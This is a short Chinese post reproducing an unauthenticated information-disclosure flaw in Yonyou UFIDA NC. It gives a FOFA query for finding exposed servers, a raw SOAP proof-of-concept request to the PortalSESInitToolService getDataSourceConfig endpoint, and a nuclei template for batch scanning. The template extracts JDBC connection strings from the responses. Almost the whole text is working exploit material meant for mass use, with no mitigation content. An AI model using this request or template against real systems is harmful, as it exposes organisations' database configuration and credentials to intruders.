漏洞复现
fofa语法:app="用友-UFIDA-NC"
POC:
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
nuclei批量yaml文件
id: yonyou_NC-uapws-database-read
info:
name: yonyou_NC-uapws-database-read
author: nigori
severity: high
description: fofa app="用友-UFIDA-NC"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: yonyou,nc,oa,bjxsec
requests:
- raw:
- |
POST /uapws/service/nc.itf.ses.inittool.PortalSESInitToolService HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:por="http://inittool.ses.itf.nc/PortalSESInitToolService">
<soapenv:Header/>
<soapenv:Body>
<por:getDataSourceConfig/>
</soapenv:Body>
</soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "jdbc"
part: body
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '(jdbc:.+\:\d{1,5}\:\w+)'